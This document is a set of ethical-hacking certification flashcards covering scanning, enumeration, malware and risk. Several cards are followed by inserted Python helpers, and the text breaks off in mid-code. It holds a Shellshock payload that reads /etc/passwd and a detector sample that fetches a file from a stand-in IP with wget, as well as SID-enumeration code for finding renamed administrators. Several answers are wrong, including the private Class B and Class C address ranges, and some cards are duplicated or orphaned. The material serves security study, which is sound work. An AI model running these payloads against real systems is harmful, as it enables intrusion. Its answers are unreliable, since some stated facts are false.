What flag or flags are set on the second step of the three-way TCP handshake? a. SYN b. SYN ACK c. ACK d. ACK PSH
B. The second step of the three-step handshake sets the SYN ACK flags.
Open source
Based on the GNU General Public License. Software that is open source is released under an open source license or to the public domain. The source code can be seen and can be modified.
Which of the following is a filtering technique used to drop packets at the routing level, typically done dynamically to respond quickly to DDoS attacks?
Black hole filtering
Symmetric algorithm
Both parties use the same cryptographic key.
System testing
Bringing together all the programs that a system comprises, for testing purposes. Programs are typically integrated in a top-down, incremental fashion.
How can the SMTP vrfy and expn commands help an attacker gain access to a Linux or UNIX system?
By confirming username guesses
This type of security test might seek to target the CEO's laptop or the organization's backup tapes to extract critical information, usernames, and passwords. a. Insider attack b. Physical entry c. Stolen equipment d. Outsider attack
C. A stolen equipment test is performed to determine what type of information might be found. The equipment could be the CEO's laptop or the organization's backup media.
You have discovered that several of your team members' computers were infected. The attack was successful because the attacker guessed or observed which websites the victims visited and infected one or more of those sites with malware. Which type of attack was executed? a. Spear phishing attack b. Phishing attack c. Watering hole attack d. SMiShing attack
C. A watering hole attack can be described as a means to trick a victim into visiting a website that is infected. The website would be one that the attacker knows the victim visits on a regular basis.
Which of the following techniques requires an attacker to listen to the conversation between the victim and server and capture the authentication token for later reuse? a. XSS b. Man in the browser c. Session replay d. CSRF
C. Authentication should be unique for each time that it occurs. If not, the credentials used to log in could be captured and replayed. This describes a session replay attack. Answer A is incorrect because cross-site scripting (XSS) works by enticing users to click a link with a script embedded. Answer B is incorrect because a man-in-the-browser attack is a Trojan. Answer D is incorrect because cross-site request forgery (CSRF) exploits the fact that a user is logged in to a legitimate site and a malicious site at the same time.
Clark is a talented coder and as such has found a vulnerability in a well-known application. Unconcerned about the ethics of the situation, he has developed an exploit that can leverage this unknown vulnerability. Based on this information, which of the following is most correct? a. Clark is a suicide hacker. b. Clark has violated U.S. Code Section 1027. c. Clark has developed a zero day. d. Clark is a white hat hacker.
C. Creating an exploit for which there is no known patch is known as a zero day.
When referring to the domain name service, what is a zone? a. A collection of domains b. The zone namespace c. A collection of resource records d. A collection of alias records
C. Each zone is a collection of structured resource records.
Your company performs PCI-DSS audits and penetration testing for third-party clients. During an approved pen test you have discovered a folder on an employee's computer that appears to have hundreds of credit card numbers and other forms of personally identifiable information (PII). Which of the following is the best course of action? a. Contact the employee and ask why they have the data. b. Make a copy of the data and store it on your local machine. c. Stop the pen test immediately and contact management. d. Continue the pen test and include this information in your report.
C. Finding any kind of PII on an employee's computer, such as credit card numbers and Social Security numbers, is a serious issue and should be dealt with before continuing the penetration test or audit.
You have just started using traceroute and were told that it can use ICMP time exceeded messages to determine the route a packet takes. Which of the following ICMP type codes maps to time exceeded? a. Type 3 b. Type 5 c. Type 11 d. Type 13
C. ICMP type 11 is the correct code for time exceeded.
What is one of the disadvantages of using John the Ripper? a. It cannot crack NTLM passwords. b. It separates the passwords into two separate halves. c. It cannot differentiate between uppercase and lowercase passwords. d. It cannot perform brute-force cracks.
C. John the Ripper cannot differentiate between uppercase and lowercase passwords.
Which form of sniffing is characterized by a large number of packets with bogus MAC addresses? a. Active sniffing b. ARP poisoning c. MAC flooding d. Passive sniffing
C. MAC flooding is the act of attempting to overload the switch's content-addressable memory (CAM) table. By sending a large stream of packets with random addresses, the CAM table of the switch will eventually fill up and the switch can hold no more entries; some switches might divert to a "fail open" state.
When discussing Windows authentication, which of the following is considered the weakest? a. NTLMv1 b. NTLMv2 c. LM d. Kerberos
C. Microsoft Windows computers have used different methods to store user passwords over the years. The oldest and least secure method uses LM passwords. These passwords are a maximum of 14 characters and store the password in two 7-character fields.
Which of the following is considered the weakest? a. NTLMv1 b. NTLMv2 c. LM d. Kerberos
C. Microsoft Windows computers have used different methods to store user passwords over the years. The oldest and least secure method uses LM passwords. These passwords are a maximum of 14 characters and store the password in two 7-character fields.
SNMP is a protocol used to query hosts and other network devices about their network status. One of its key features is its use of network agents to collect and store management information, such as the number of error packets received by a managed device. Which of the following makes it a great target for hackers? a. It's enabled by all network devices by default. b. It's based on TCP. c. It sends community strings in clear text. d. It is susceptible to sniffing if the community string is known.
C. Most SNMP devices are configured with public and private as the default community strings. These are sent in clear text.
Which of the following is a proprietary information security standard that requires organizations to follow security best practices and use 12 high-level requirements, aligned across six goals? a. SOX b. FISMA c. PCI-DSS d. Risk Management Framework
C. PCI-DSS is a proprietary information security standard that requires organizations to follow security best practices and use 12 high-level requirements, aligned across 6 goals.
________ are similar to programs such as WinZip, Rar, and Tar in that they compress the file yet are used to hide the true function of malware. a. Compressors b. Wrappers c. Packers d. Crypters
C. Packers are similar to programs such as WinZip, Rar, and Tar in that they compress the file yet are used to hide the true function of malware.
Which of the following protocols is used when an attacker attempts to launch a man-in-the-middle attack by manipulating sequence and acknowledgment numbers? a. ICMP b. UDP c. TCP d. IP
C. TCP uses sequence numbers. Session hijacking is possible because it takes advantage of the fact that these sequence numbers can be predicted. By submitting the correct sequence number at the right time, the attacker can take control of the session.
You are part of a pen testing team that has been asked to assess the risk of an online service. Management is concerned as to what the cost would be if there was an outage and how frequent these outages might be. Your objective is to determine whether there should be additional countermeasures. Given the following variables, which of the following amounts is the resulting annualized loss expectancy (ALE)? Single loss expectancy = $2,500 Exposure factor = .9 Annual rate of occurrence = .4 Residual risk = $300 a. $960 b. $120 c. $1,000 d. $270
C. The ALE is calculated by the following: ALE = SLE × ARO, or $2,500 × .4 = $1,000.
You have captured packets that you believe have had the source address changed to a private address. Which of the following is a private address? a. 176.12.9.3 b. 12.27.3.1 c. 192.168.14.8 d. 127.0.0.1
C. The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks: Class A network IP address range = 10.0.0.0-10.255.255.255, Class B network IP address range = 172.31.0.0-172.31.255.255, and Class C network IP address range = 192.168.255.0-192.168.255.255.
Why would an attacker scan for port 445? a. To attempt to cause DoS of the NetBIOS SMB service on the victim system b. To scan for file and print sharing on the victim system c. To scan for SMB services and verify that the system is Windows 2000 or greater d. To scan for NetBIOS services and verify that the system is truly a Windows NT server
C. The SMB protocol is used for file sharing in Windows 2000. In 2000 and newer systems, Microsoft added the capability to run SMB directly over TCP port 445.
Why would an attacker scan for port 445? a. To attempt to cause DoS of the NetBIOS SMB service on the victim system b. To scan for file and print sharing on the victim system c. To scan for SMB services and verify that the system is Windows OS d. To scan for NetBIOS services and verify that the system is truly a Windows NT server
C. The SMB protocol is used for file sharing in Windows 2000. In 2000 and newer systems, Microsoft added the capability to run SMB directly over TCP port 445.
You would like to attempt a man-in-the-middle attack to take control of an existing session. What transport layer protocol would allow you to predict a sequence number? a. ICMP b. UDP c. TCP d. STP
C. The only protocol listed that uses sequence numbers is TCP.
You have successfully scanned a system and identified the following port 80 open. What is the next step you should perform? a. Attempt to go to the web page and examine the source code. b. Use FTP to connect to port 80. c. Telnet to the open port and grab the banner. d. Attempt to connect to port 443.
C. The pen tester will typically continue to explore the service that has been identified, which means that an attempt to banner grab would be the next step.
What type of scan is harder to perform because of the lack of response from open services and because packets could be lost due to congestion or from firewall blocked ports? a. Stealth scanning b. ACK scanning c. UDP scanning d. FIN scan
C. UDP scanning is harder to perform because of the lack of response from open services and because packets could be lost due to congestion or a firewall blocking ports.
Which of the following is NOT a characteristic of Common Vulnerabilities and Exposures (CVE)?
CVE defines severity ratings: Low, Medium and High.
Which of the following is an industry standard that is used to provide a score of the risk of a given security vulnerability?
CVSS
Which of the following is NOT a characteristic of the Common Vulnerability Scoring System (CVSS)?
CVSS is a publicly available and free to use list of known vulnerabilities.
Which of the following measures whether or not a public exploit is available?
CVSS temporal group exploit code maturity metric
Dial back
Can be used for personal identification. A procedure established for positively identifying a terminal that is dialing into a computer system. It works by disconnecting the calling terminal and reestablishing the connection by the computer system dialing the telephone number of the calling terminal.
active vulnerability scanner (AVS)
Can take action to block an attack, such as block a dangerous IP address, whereas a passive scanner can only gather information.
Cloning
Cell phone cloning occurs when the hacker copies the electronic serial numbers from one cell phone to another, thereby duplicating the cell phone.
Which activities should be included into vulnerability research? (Check all that apply.)
Checking newly released alerts regarding relevant innovations and product improvements for security systems; being informed about new products and technologies in order to find news related to current exploits
Pretexting
Collecting information about a person under false pretenses.
Netcat is an example of which of the following?
Command shell Trojan
Asynchronous transfer mode (ATM)
Communication technology that uses high-bandwidth, low-delay transport technology and multiplexing techniques. Through dedicated media connections, it provides simultaneous transport of voice, video, and data signals more than 50 times faster than current technology. ATM might be used in phone and computer networks of the future.
Input controls
Computer controls designed to provide reasonable assurance that transactions are properly authorized before being processed by the computer; that transactions are accurately converted to machine-readable form and recorded in the computer; that data files and transactions are not lost, added, duplicated, or improperly changed; and that incorrect transactions are rejected, corrected, and, if necessary, resubmitted on a timely basis.
Artificial intelligence
Computer software that can mimic the learning capability of a human, such as reasoning and learning.
Detective controls
Controls that identify and correct undesirable events that have occurred.
Access control
Controls that monitor the flow of information between the subject and object. They ensure that only the operations permitted are performed.
Preventative controls
Controls that reduce risk and are used to prevent undesirable events from happening.
Backup
Copies of programs, databases, other files, and so on are made with the purpose to restore information in case it is lost; for instance, because of a computer failure, a natural disaster, or a virus infection.
Which of the following is not a common tool used for static malware analysis?
CurrPorts
Which of the following is a common framework applied by business management and other personnel to identify potential events that may affect the enterprise, manage the associated risks and opportunities, and provide reasonable assurance that objectives will be achieved? a. NIST SP 800-37 b. Qualitative risk assessment c. PC-DSS d. Risk management framework
D. A risk management framework is a complete framework used to secure the enterprise, identify risk, build controls, and provide reasonable assurance that objectives will be achieved.
Which of the following is not a common tool used for static malware analysis? a. IDA Pro b. BinText c. UPX d. CurrPorts
D. CurrPorts is not used for static analysis; it is used to examine what ports are open and running on an active machine. Answers A, B, and C are incorrect because they all are tools used for static analysis.
Kevin and his friends are going through a local IT firm's garbage. Which of the following best describes this activity? a. Reconnaissance b. Intelligence gathering c. Social engineering d. Dumpster diving
D. Dumpster diving is the act of going through someone's trash.
Which of the following is one primary difference between a malicious hacker and an ethical hacker? a. Malicious hackers use different tools and techniques than ethical hackers use. b. Malicious hackers are more advanced than ethical hackers because they can use any technique to attack a system or network. c. Ethical hackers obtain permission before bringing down servers or stealing credit card databases. d. Ethical hackers use the same methods but strive to do no harm.
D. Ethical hackers use the same methods but strive to do no harm.
C. A watering hole attack can be described as a means to trick a victim into visiting a website that is infected. The website would be one that the attacker knows the victim visits on a regular basis.
Which of the following programs can be used for port redirection? a. Loki b. Recub c. Girlfriend d. FPipe
D. FPipe is used specifically for port redirection. Answer A is incorrect because Loki is an ICMP tunneling tool. Answers B and C are incorrect because Recub and Girlfriend are Trojans.
You're concerned that an attacker may have gained access to one of your Linux systems, planted backdoors, and covered her tracks. Which of the following tools could you use to examine the log files? a. Notepad b. Type c. Sc query d. Grep
D. Grep is a Unix command used to search files for the occurrence of a string of characters that matches a specified pattern.
Which individuals believe that hacking and defacing websites can promote social change? a. Ethical hackers b. Gray hat hackers c. Black hat hackers d. Hacktivists
D. Hacktivists seek to promote social change; they believe that defacing websites and hacking servers is acceptable as long as it promotes their goals. Regardless of their motives, hacking remains illegal, and they are subject to the same computer crime laws as any other criminal.
What is the best alternative if you discover that a rootkit has been installed on one of your computers? a. Copy the system files from a known good system b. Perform a trap and trace c. Delete the files and try to determine the source d. Rebuild from known good media
D. If a rootkit is discovered, you will need to rebuild the OS and related files from known-good media. This usually means performing a complete reinstall.
You are part of an incident response team. You have discovered that an attacker broke into the network, planted a rootkit, and secretly installed a cryptominer. To contain the incident and complete the investigation, what is the best alternative now that you found a rootkit has been installed on one of your computers? a. Copy the system files from a known good system b. Perform a trap and trace c. Delete the files and try to determine the source d. Rebuild from known good media
D. If a rootkit is discovered, you will need to rebuild the OS and related files from known-good media. This usually means performing a complete reinstall.
After the completion of the pen test, you have provided the client with a list of controls to implement to reduce the identified risk. What term best describes the risk that remains after the controls have been implemented? a. Gap analysis b. Total risk c. Inherent risk d. Residual risk
D. It is impossible to eliminate all risk. The remaining risk — after the controls are put in place — is known as the residual risk.
Which of the following corresponds to user mode and is the level of least privilege? a. Ring 0 b. Ring 1 c. Ring 2 d. Ring 3
D. Most modern OSs use a ring model where the inner ring, 0, has the most privilege and the outer ring, 3, has the least privilege.
When reviewing the Windows core design, which of the following corresponds to user mode and is the level of least privilege? a. Ring 0 b. Ring 1 c. Ring 2 d. Ring 3
D. Most modern OSs use a ring model where the inner ring, 0, has the most privilege and the outer ring, 3, has the least privilege.
You are working with a pen test team that is performing enumeration. You have just seen a team member enter the following commands. What do they demonstrate?
C:\>user2sid \\truck guest
S-1-5-21-343818398-789336058-1343024091-501
C:\>sid2user 5 21 343818398 789336058 1343024091 500
Name is Joe
Domain is Truck
a. The Joe account has a SID of 500. b. The guest account has not been disabled. c. The guest account has been disabled. d. The true administrator is Joe.
D. One important goal of enumeration is to determine the true administrator. The guest account's SID ends in the well-known RID 501; keeping the same domain identifier and substituting the well-known administrator RID 500, sid2user resolves that SID to the name Joe. The built-in administrator account has therefore been renamed to Joe. Nothing in the output says whether the guest account is enabled or disabled.
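The RID substitution behind user2sid/sid2user can be scripted. The following Python is an added example (it is not from the original flashcards or from the user2sid/sid2user tools): it parses a SID string, rebuilds the SID for another RID in the same domain, and names the well-known RIDs. The SID is the one from the question; the RID table is the documented set of well-known Windows RIDs.

```python
"""Parse Windows SIDs and map well-known RIDs (added example)."""
import re

# Well-known relative identifiers (RIDs).  They are fixed by Windows, so a
# renamed built-in Administrator keeps RID 500 whatever it is called.
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in)",
    501: "Guest (built-in)",
    502: "krbtgt (domain KDC account)",
    512: "Domain Admins",
    513: "Domain Users",
    514: "Domain Guests",
    519: "Enterprise Admins",
}

# S-1-<identifier authority>-<sub-authorities...>-<RID>
SID_RE = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


def parse_sid(sid):
    """Split a SID string into (authority, [sub-authorities], rid)."""
    m = SID_RE.match(sid.strip())
    if not m:
        raise ValueError("not a SID: %r" % sid)
    authority = int(m.group(1))
    parts = [int(p) for p in m.group(2).split("-") if p]
    if len(parts) < 2:
        raise ValueError("SID has no RID component: %r" % sid)
    return authority, parts[:-1], parts[-1]


def domain_sid(sid):
    """Everything except the RID: identifies the machine or domain."""
    authority, subs, _rid = parse_sid(sid)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def sid_with_rid(sid, rid):
    """Rebuild a SID for another account in the same domain (what sid2user resolves)."""
    return "%s-%d" % (domain_sid(sid), rid)


def describe_rid(rid):
    """Name a RID; accounts created by administrators start at 1000."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    return "ordinary account or group" if rid >= 1000 else "other reserved RID"


def sid2user_args(sid):
    """sid2user takes the SID as space-separated numbers without the 'S-1-' prefix."""
    authority, subs, rid = parse_sid(sid)
    return " ".join(str(n) for n in [authority] + subs + [rid])


def enumerate_targets(known_sid, rids=(500, 501, 512)):
    """From any known SID in a domain, build the SIDs worth resolving next."""
    return {rid: sid_with_rid(known_sid, rid) for rid in rids}


if __name__ == "__main__":
    GUEST = "S-1-5-21-343818398-789336058-1343024091-501"  # from the user2sid output above
    for rid, sid in enumerate_targets(GUEST).items():
        print(rid, describe_rid(rid), "->", "sid2user", sid2user_args(sid))
```

Because the RID is fixed by Windows and the name is not, resolving RID 500 is the reliable way to find the real administrator; the defensive corollary is that renaming the account buys nothing against an attacker who can enumerate SIDs, which is why null sessions and anonymous SID lookups should be blocked.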
One of the members of your red team would like to run Dsniff on a span of the network that is composed of hubs. Which of the following types best describes this attack? a. Active sniffing b. ARP poisoning c. MAC flooding d. Passive sniffing
D. Passive sniffing is all that is required to listen to traffic on a hub.
Which of the following describes a type of malware that restricts access to the computer system's files and folders until a monetary payment is made? a. Crypter b. Trojan c. Spyware d. Ransomware
D. Ransomware is a type of malware that encrypts all files until a payment is made. Answer A is incorrect because a crypter is used to encrypt malware.
Your client has asked you to run an Nmap scan against the servers it has located in its DMZ. The client would like you to identify the OS. Which of the following switches would be your best option? a. nmap -P0 b. nmap -sO c. nmap -sS d. nmap -O
D. nmap -O enables OS detection (TCP/IP stack fingerprinting). The other switches do something else: -P0 skips host discovery, -sO is an IP protocol scan, and -sS is a TCP SYN port scan; none of them identifies the operating system.
This application uses clear-text community strings that default to public and private. Which of the following represents the correct port and protocol? a. UDP 69 b. TCP 161 c. TCP 69 d. UDP 161
D. SNMP runs over UDP and uses two ports: agents listen for queries on UDP 161, and managers receive traps on UDP 162. SNMPv1 and v2c are vulnerable because the community strings are sent in clear text.
After finding port 161 open on a targeted system, you have decided to attempt to guess what passwords/community strings to use. Which of the following should you try first? a. user/password b. abc123/passw0rd c. Password/administrator d. Public/private
D. SNMP is a network management tool that is used for collecting information about the status of network devices. Versions 1 and 2 of SNMP use default community strings of public and private.
Which of the following is not a client-side session hijacking technique? a. Malicious JavaScript codes b. XSS c. CSRF d. Session fixation
D. Session fixation is not launched on the client, and the fixed ID must be provided by the attacker. Answers A, B, and C are incorrect because malicious JavaScript codes, cross-site scripting (XSS), and cross-site request forgery (CSRF) are client-side session hijacking techniques.
You've just performed a port scan against an internal device during a routine pen test. Nmap returned the following response: "Starting Nmap 7.30 at 2016-10-10 11:06 / Nmap scan report for 192.168.123.100 / Host is up (1.00s latency). / Not shown: 993 closed ports / PORT STATE SERVICE / 80/tcp open http / 161/tcp open snmp / 515/tcp open lpd / MAC Address: 00:1B:A9:01:3A:21" Based on this scan result, which of the following is most likely correct? a. The host is most likely a Windows computer. b. The host is most likely a Linux computer. c. The host is a Cisco router. d. The host is a printer.
D. The OUI 00:1B:A9 (the first three octets of the MAC address) is registered to Brother Industries, a printer manufacturer. Port 515 is also open, which is LPD, the line printer daemon; together with HTTP and SNMP for management, this is the profile of a network printer.
Which DNS record gives information about the zone, such as administrator contact and so on? a. CNAME b. MX record c. A record d. Start of Authority
D. The Start of Authority record gives information about the zone, such as the administrator contact.
Which of the following types of rootkits would be found at ring 0? a. Software b. Library c. Application d. Kernel
D. The inner layer of the OS is ring 0. It is at this layer that kernel rootkits are found.
During a packet capture, you have found several packets with the same IPID. You believe these packets to be fragmented. One of the packets has an offset value of 5dc hex, and the more bit is off. With this information, which of the following statements is true? a. This might be any fragmented packet except the first in the series. b. This might be any fragmented packet except the last in the series. c. This is the first fragment. d. This is the last fragment.
D. The fragment offset field counts 8-byte units, so 0x5dc (1500 decimal) places this fragment 12,000 bytes into the original datagram; a non-zero offset rules out the first fragment. Because the more-fragments (MF) bit is 0, no further fragments follow, so this is the last fragment.
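The reasoning above (offset in 8-byte units, MF bit decides whether more follow) is mechanical enough to code. The following Python is an added example, not part of the original card: it builds minimal IPv4 headers as constructed test data, classifies a fragment from its offset and MF bit, and checks a fragment series for gaps or a missing last fragment. Only the offset 0x5dc and the cleared MF bit come from the question; every other value is constructed.

```python
"""Classify IPv4 fragments and check a fragment series (added example)."""
import struct

MF = 0x2000           # "more fragments" flag
DF = 0x4000           # "don't fragment" flag
OFFSET_MASK = 0x1FFF  # 13-bit fragment offset, in 8-byte units
HDR_FMT = "!BBHHHBBH4s4s"  # 20-byte IPv4 header without options


def build_ipv4_header(ident, flags, offset_units, total_length=1500, proto=17):
    """Constructed test data: a 20-byte IPv4 header with the given IPID,
    flags and fragment offset.  Checksum is left at 0."""
    ver_ihl = (4 << 4) | 5
    flags_frag = (flags & 0xE000) | (offset_units & OFFSET_MASK)
    return struct.pack(HDR_FMT, ver_ihl, 0, total_length, ident, flags_frag,
                       64, proto, 0, bytes([192, 168, 1, 10]), bytes([192, 168, 1, 20]))


def classify_fragment(header):
    """Return IPID, byte offset, payload length and the fragment's position."""
    if len(header) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, ident, flags_frag = struct.unpack("!BBHHH", header[:8])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4
    more = bool(flags_frag & MF)
    offset_bytes = (flags_frag & OFFSET_MASK) * 8  # the field counts 8-byte blocks
    if offset_bytes == 0 and not more:
        kind = "unfragmented"
    elif offset_bytes == 0:
        kind = "first"
    elif more:
        kind = "middle"
    else:
        kind = "last"  # MF clear and offset non-zero
    return {"ipid": ident, "offset_bytes": offset_bytes,
            "payload_len": total_len - ihl, "more_fragments": more, "kind": kind}


def check_series(fragments):
    """Order the fragments of one datagram and return (complete, datagram_length).
    complete is False when a fragment is missing, fragments overlap, or the
    last one (MF=0) was never seen."""
    infos = sorted((classify_fragment(h) for h in fragments),
                   key=lambda i: i["offset_bytes"])
    if len({i["ipid"] for i in infos}) != 1:
        raise ValueError("fragments belong to different datagrams")
    complete, expected = True, 0
    for info in infos:
        if info["offset_bytes"] != expected:
            complete = False  # gap or overlap
        expected = info["offset_bytes"] + info["payload_len"]
    if infos[-1]["more_fragments"]:
        complete = False  # final fragment still missing
    return complete, expected


if __name__ == "__main__":
    # The question's fragment: offset 0x5dc, MF clear -> 12000 bytes in, last fragment.
    print(classify_fragment(build_ipv4_header(0x1234, 0, 0x5DC, total_length=120)))
```

The series check is the same bookkeeping an IDS or reassembling host performs; overlapping or never-completed series are how fragmentation is abused to evade inspection or exhaust reassembly buffers, so a monitor that only classifies single fragments misses the interesting cases.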
During which step of the incident response process would you be tasked with building the team, identifying roles, and testing the communication system? a. Containment b. Recovery c. Preparation d. Notification
C. Building the team, identifying roles, and testing the communication system are done in the preparation phase of incident response, before any incident occurs. Containment and recovery take place during an incident, and notification presupposes a team and communication channels that already exist.
Which of the following Netcat commands could be used to perform a UDP scan of the lower 1024 ports? a. nc -sS -O target 1-1024 b. nc -hU <host(s)> c. nc -sU -p 1-1024 <host(s)> d. nc -u -v -w2 <host> 1-1024
D. The proper syntax for a UDP scan using Netcat is nc -u -v -w2 <host> 1-1024: -u selects UDP, -v gives verbose output, and -w2 sets a two-second timeout so the scan does not hang on silent ports. The -sS, -sU and -O style options in the other answers are Nmap switches, not Netcat ones. Netcat is considered the Swiss-army knife of hacking tools because it is so versatile.
Your ethical hacking firm has been hired to conduct a penetration test. Which of the following documents limits the scope of your activities? a. Nondisclosure agreement b. PCI-DSS c. Memorandum of understanding d. Terms of engagement
D. The scope of the activity is defined by the terms of engagement.
You have just gotten an alert from your IDS. It has flagged the following string: env x='() { :;}; echo exploit' bash -c 'cat /etc/passwd'. What is the attacker attempting to do? a. Use the Heartbleed vulnerability to display the passwd file. b. Use the Shellshock vulnerability to change the passwd file. c. Use the Heartbleed vulnerability to change the passwd file. d. Use the Shellshock vulnerability to display the passwd file.
D. The string is the classic Shellshock (CVE-2014-6271) pattern: vulnerable versions of bash imported the function definition stored in the environment variable x and then executed whatever followed the closing brace, here echo exploit. The command being run is cat /etc/passwd, which only reads and displays the file; nothing in the string modifies it, and Heartbleed is an OpenSSL memory disclosure bug unrelated to bash.
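The IDS signature behind that alert is simple to reproduce. The following Python is an added example (not from the original card or from any particular IDS): it flags the "() {" function-export prefix that vulnerable bash parsed out of environment variables and pulls out the command that trails the function body, which is the part an analyst wants to triage. The sample lines are constructed except for the string from the alert; the 198.51.100.7 address is from the documentation range and is constructed too.

```python
"""Flag Shellshock-style function exports in request data (added example)."""
import re
from typing import List, Optional, Tuple

# Bash's import of exported functions keyed on a value beginning "() {".
# Real traffic varies the whitespace, so the pattern allows it.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Function body up to the closing "};", then whatever bash would run on import.
TRAILING_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;\s*(.+)$")


def is_shellshock(payload: str) -> bool:
    """True when the payload carries a bash function-definition prefix."""
    return SHELLSHOCK_RE.search(payload) is not None


def trailing_command(payload: str) -> Optional[str]:
    """Return the command that follows the function body, or None."""
    m = TRAILING_RE.search(payload)
    return m.group(1).strip() if m else None


def scan(lines: List[str]) -> List[Tuple[str, Optional[str]]]:
    """Run the signature over lines (HTTP headers, CGI env values, shell history)."""
    return [(line, trailing_command(line)) for line in lines if is_shellshock(line)]


# Constructed sample input; the first line is the string from the IDS alert.
SAMPLE = [
    "env x='() { :;}; echo exploit' bash -c 'cat /etc/passwd'",
    "User-Agent: () { :; }; /bin/bash -c 'wget http://198.51.100.7/x -O /tmp/x'",
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "Cookie: session=abc123; theme=dark",
]

if __name__ == "__main__":
    for line, cmd in scan(SAMPLE):
        print("SHELLSHOCK:", line)
        print("  runs:", cmd)
```

The signature is deliberately loose: parentheses followed by a brace never appear in a legitimate User-Agent, Cookie or Referer header, so the false-positive cost is low, and the extracted trailing command tells you at a glance whether the attacker was probing (echo) or dropping a payload (wget, curl, nc).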
In which layer of the OSI model do SYN flood attacks occur? a. Network b. Data link c. Physical d. Transport
D. The transport layer is the correct answer. TCP can be the target for SYN attacks, which are a form of DoS.
Assume you performed a full backup on Monday and then an incremental backup on Tuesday and Wednesday. If there was an outage on Thursday, what would you need to restore operations? a. The full backup from Monday b. Both incremental backups from Tuesday and Wednesday c. The full backup from Monday and Wednesday's incremental backup d. The full backup from Monday and both incremental backups from Tuesday and Wednesday
D. An incremental backup captures only what changed since the previous backup of any kind, so recovery needs the last full backup plus every incremental taken after it, restored in order: Monday's full, then Tuesday's and Wednesday's incrementals.
During an internal pen test, you have gained access to an internal switch. You have been able to SPAN a port and are now monitoring all traffic with Wireshark. While reviewing this traffic, you are able to identify the OS of the devices that are communicating. What best describes this activity? a. Vulnerability scanning b. Nmap port scanning c. Active OS fingerprinting d. Passive OS fingerprinting
D. Using Wireshark to examine the traffic is considered passive OS fingerprinting.
As part of a review of an access control system, you have been asked to recommend a replacement for the username/password system that is currently used. As such, which of the following is best when selecting a biometric system? a. A high false acceptance rate b. A high false rejection rate c. A high false acceptance rate and false rejection rate d. A low crossover error rate
D. When examining biometric systems, one item to consider is the crossover error rate (CER). The lower the CER, the more accurate the system.
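The crossover error rate is the point where the false acceptance rate (FAR) and false rejection rate (FRR) curves meet as the matching threshold is swept. The following Python is an added example, not from the original card: the FAR/FRR sweep is constructed to show the method, and the interpolation and threshold-selection functions are mine. It also shows that the CER is a comparison metric only; the operating threshold is chosen by policy, usually tighter than the CER when false acceptance is the costlier error.

```python
"""Find the crossover error rate of a biometric system (added example)."""
from typing import List, Optional, Tuple

# Constructed sweep: (match threshold, FAR, FRR).  Tightening the threshold
# lowers FAR (fewer impostors accepted) and raises FRR (more users rejected).
SWEEP: List[Tuple[float, float, float]] = [
    (0.50, 0.200, 0.010),
    (0.60, 0.120, 0.020),
    (0.70, 0.060, 0.040),
    (0.80, 0.020, 0.080),
    (0.90, 0.005, 0.150),
]


def crossover(sweep: List[Tuple[float, float, float]]) -> Tuple[float, float]:
    """Return (threshold, CER) by linear interpolation between the two sweep
    points where FAR - FRR changes sign.  Raises if the curves never cross."""
    for (t0, far0, frr0), (t1, far1, frr1) in zip(sweep, sweep[1:]):
        d0, d1 = far0 - frr0, far1 - frr1
        if d0 == 0:
            return t0, far0
        if d0 * d1 < 0:
            frac = d0 / (d0 - d1)  # how far along the segment the sign flips
            return t0 + frac * (t1 - t0), far0 + frac * (far1 - far0)
    raise ValueError("FAR and FRR curves do not cross within this sweep")


def pick_threshold(sweep: List[Tuple[float, float, float]],
                   max_far: float) -> Optional[float]:
    """Loosest threshold whose FAR stays at or below the policy ceiling, or None.
    The price is the FRR at that point, which is the user-friction cost."""
    for t, far, _frr in sorted(sweep):
        if far <= max_far:
            return t
    return None


def compare(cer_a: float, cer_b: float) -> str:
    """Lower CER means a more accurate system overall."""
    if cer_a == cer_b:
        return "equal"
    return "A" if cer_a < cer_b else "B"


if __name__ == "__main__":
    t, cer = crossover(SWEEP)
    print("CER %.3f at threshold %.3f" % (cer, t))
    print("threshold for FAR <= 1%%: %s" % pick_threshold(SWEEP, 0.01))
```

With this sweep the CER is 5% at a threshold of 0.725. A system guarding a data centre door would not run there: it would accept a 15% rejection rate at threshold 0.90 to hold FAR at 0.5%, while a convenience login on a phone might sit on the other side of the crossover.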
Which of the following is best when selecting a biometric system? a. A high false acceptance rate b. A high false rejection rate c. A high false acceptance rate and false rejection rate d. A low crossover error rate
D. When examining biometric systems, one item to consider is the crossover error rate (CER). The lower the CER, the more accurate the system.
During the network mapping phase of a pen test, you have discovered the following two IP addresses: 192.168.1.24 and 192.168.1.35. They both have a mask of 255.255.255.224. Which of the following is true? a. They are on the same network. b. They both have a default gateway of 192.168.1.63. c. They both have a default gateway of 192.168.1.254. d. They are on separate subnets.
D. A mask of 255.255.255.224 is a /27, which carves the range into subnets of 32 addresses: 192.168.1.0 to .31, .32 to .63, .64 to .95, and so on. 192.168.1.24 falls in the .0 subnet and 192.168.1.35 in the .32 subnet, so they are on separate subnets. 192.168.1.63 is the broadcast address of the .32 subnet, not a gateway, and nothing in the question gives the gateway address.
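The subnet arithmetic in that answer generalises to any mask. The following Python is an added example (not from the original card) using only the standard library's ipaddress module; the addresses and mask are the ones in the question, and it also lists the /27 subnets of the enclosing /24 so the ".0, .32, .64" sequence in the explanation can be checked.

```python
"""Subnet membership and boundaries for a dotted mask (added example)."""
import ipaddress
from typing import List


def network_of(host: str, mask: str) -> ipaddress.IPv4Network:
    """Network containing `host` under `mask`; strict=False zeroes the host bits."""
    return ipaddress.IPv4Network("%s/%s" % (host, mask), strict=False)


def same_subnet(a: str, b: str, mask: str) -> bool:
    """True when both hosts share a network address under the mask."""
    return network_of(a, mask) == network_of(b, mask)


def describe(host: str, mask: str) -> dict:
    """Network, broadcast and usable host range for the host's subnet."""
    net = network_of(host, mask)
    return {
        "network": str(net.network_address),
        "prefix": net.prefixlen,
        "broadcast": str(net.broadcast_address),
        "first_host": str(net.network_address + 1),
        "last_host": str(net.broadcast_address - 1),
        "usable_hosts": max(0, net.num_addresses - 2),  # /31 and /32 have none
    }


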